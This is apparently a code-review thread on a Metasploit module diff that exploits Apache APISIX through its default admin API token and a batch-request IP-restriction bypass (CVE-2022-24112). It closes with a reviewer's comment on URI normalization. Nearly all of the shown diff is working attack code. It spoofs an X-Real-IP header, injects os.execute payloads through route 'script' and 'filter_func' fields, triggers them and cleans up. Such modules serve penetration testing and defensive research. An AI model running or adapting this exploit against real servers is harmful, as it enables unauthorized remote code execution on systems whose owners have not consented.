modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb

```diff
@@ -0,0 +1,226 @@
+      return Exploit::CheckCode::Safe('This version has not the script feature')
+    end
+
+    vprint_good('This version has the script feature')
+    return Exploit::CheckCode::Appears('There is direct access to the routes using the provided token') if direct_access?
+
+    vprint_status('There is no direct access to the routes. Trying to bypass restriction')
+    pipeline = [
+      {
+        method: 'GET',
+        path: "#{target_uri.path}/admin/routes"
+      }
+    ]
+    res = batch_request(batch_body(pipeline))
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears('Can bypass restriction using batch request')
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    if direct_access?
+      add_route
+    else
+      vprint_status 'Trying to bypass restriction'
+      payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
+      add_route_batch(payload_uri)
+      # trigger the payload
+      apisix_request({
+        'uri' => normalize_uri(payload_uri),
+        'method' => 'GET'
+      })
+    end
+    handler
+    clean_up(payload_uri) if payload_uri
+  end
+
+  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
+  def batch_request(data = nil)
+    params = {
+      'uri' => normalize_uri(target_uri.path.to_s + '/batch-requests'),
+      'method' => 'POST'
+    }
+    params.merge!({ 'data' => data }) if data
+
+    apisix_request(params)
+  end
+
+  def batch_body(pipeline = [])
+    headers = {
+      'X-Real-IP': datastore['ALLOWED_IP'].to_s,
+      'X-API-KEY' => datastore['API_KEY'].to_s,
+      'Content-Type': 'application/json'
+    }
+
+    {
+      headers: headers,
+      timeout: 1500,
+      pipeline: pipeline
+    }.to_json
+  end
+
+  def base_data
+    {
+      'uri' => Rex::Text.rand_text_alpha_lower(6),
+      'upstream' => {
+        'type' => 'roundrobin',
+        'nodes' => { "#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}": 1 }
+      }
+    }
+  end
+
+  def add_route
+    # This method use the script parameter to execute the payload
+    data = base_data.merge({
+      'script' => "os.execute('PAYLOAD');".gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+    })
+    params = {
+      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
+      'method' => 'POST'
+    }
+
+    params.merge!({ 'data' => JSON::dump(data) })
+
+    apisix_request(params)
+  end
+
+  def add_route_batch(payload_uri)
+    # This methos use the filter_func parameter to execute the payload
+    data = base_data.merge({
+      uri: payload_uri,
+      name: Rex::Text.rand_text_alpha_lower(6),
+      method: '[GET]',
+      filter_func: "function(vars) os.execute('PAYLOAD'); return true end"
+    }).to_json
+    data.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+
+    pipeline = [
+      {
+        method: 'PUT',
+        path: "#{target_uri.path}/admin/routes/index",
```

Comment:
Does this need to be normalized?

```suggestion
        path: normalize_uri(target_uri.path, '/admin/routes/index'),
```